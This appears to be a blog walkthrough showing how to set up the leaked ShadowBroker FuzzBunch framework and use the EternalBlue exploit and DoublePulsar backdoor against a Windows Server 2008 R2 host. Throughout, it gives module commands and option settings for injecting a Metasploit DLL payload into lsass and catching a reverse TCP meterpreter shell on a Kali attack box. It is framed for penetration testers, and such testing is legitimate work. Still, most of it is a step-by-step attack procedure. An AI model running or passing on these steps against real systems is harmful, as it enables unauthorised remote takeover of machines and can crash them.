[su_heading align=”left”]This walk through assumes you know a thing or two and won’t go into major detail. After all it’s meant for fellow researchers and penetration testers.[/su_heading]
Findings so far…
Findings from using these tools are the following so far
[su_note]The default process that Doublepulsar injects into is ‘lsass’ It was observed that whilst testing against Windows 2008 R2 SP1 that this caused the ‘lsass’ process to become unstable over time and resulting in some cases in a BSOD.[/su_note]
- No domain is needed for the tools to work.
- An active user session is also not needed.
Fuzzbunch setup
Firstly we need to setup our environment for the ShadowBroker tools to run in.
In my case I created a Windows 7 VM for the task.
Prerequisites for this exercise are
- A Windows XP/7 VM
- Python 2.6
- Pywin32 Version 2.12
- ShadowBroker Dump
Once your environment is setup and you have downloaded the ShadowBroker archive, unzip it to a path of your choice.
In this instance I chose the root of the C: drive.
We then need to edit a few of the files to work with our environment as on first run you will receive various error messages.
Firstly we need to edit the “fb.py” file located in the /windows folder and comment out the line below.
Save the file and open up “Fuzzbunch.xml” you now need to change the “ResourcesDir” and “LogDir” path to match that of your environment.
Note: If there is no log directory then please create it and add the path.
We should now be ready to run the Fuzzbunch tool.
Launch a command prompt and navigate to the /windows folder inside the ShadowBrokers folder.
Type the below command and hit return.
fb.py
FuzzBunch should now be running in your command prompt like the below screen shot.
Listener and Payload
Now, we need to setup our Linux attack box. For the purpose of this post I’ll be using a Kali rolling VM with Metasploit installed.
Let’s go ahead and launch Metasploit, create a DLL payload and listener.
The target I am attacking is a x64 Windows Server 2008 R2 system. So I setup the following payload and saved it as shown in the screen shot below.
Now for the handler a x64 reverse tcp meterpreter.
We’ll run the handler and move on to the next step.
OK, the payload you created needs copying over to the virtual machine where FuzzBunch is sitting and waiting.
Back to Fuzzbunch
Let’s return to our Windows VM.
We can now start entering our details into the FuzzBunch tool.
For most settings we can accept the defaults, the ones that we do need to change are below.
[?] Default Target IP Address [] : Your Target's IP [?] Default Callback IP Address [] : Your VM's IP [?] Use Redirection [yes] : NO [?] Base Log directory [c:\logs] : Input your log path Index Project ----- ------- 0 Create a New Project [?] Project [0] : 0 [?] New Project Name : Give your project a name
Now our initial variables are set you should now be at the fb prompt.
Launching the exploit plugin
Launch the EternalBlue module.
use eternalblue
Again, we can accept all defaults except the below.
[*] Mode :: Delivery mechanism 0) DANE Forward deployment via DARINGNEOPHYTE *1) FB Traditional deployment from within FUZZBUNCH [?] Mode [0] : 1
Change the above from it’s default setting of “0” to “1”, you can then execute the exploit, (Some details from my test have been redacted for security).
Injecting our DLL payload
Now the tool has created the backdoor onto the vulnerable system we can now move on to running DoublePulsar which will inject our DLL payload.
use doublepulsar
Once again we can accept most of the defaults, just change the variables below.
[*] Architecture :: Architecture of the target OS 0) x86 x86 32-bits *1) x64 x64 64-bits
The above setting defaults to x86 and will need changing to x64.
[+] Set Architecture => x64 [*] Function :: Operation for backdoor to perform *0) OutputInstall Only output the install shellcode to a binary file on diskisk. 1) Ping Test for presence of backdoor 2) RunDLL Use an APC to inject a DLL into a user mode process. 3) RunShellcode Run raw shellcode 4) Uninstall Remove's backdoor from system [?] Function [0] :
We need to select option “2” so that we can use our newly created DLL payload.
Next we need to enter the path to our DLL file
[*] DllPayload :: DLL to inject into user mode [?] DllPayload [] : PathToOurDLL
All other variables can be left at their default value and you can proceed to execute the plugin.
Hack all the things!
If everything has been successful you should should now have a Meterpreter shell waiting on your attack box.
[su_note]If you don’t have a shell yet then something has obviously gone wrong, check your steps and leave a comment and I will try and help you through it.[/su_note]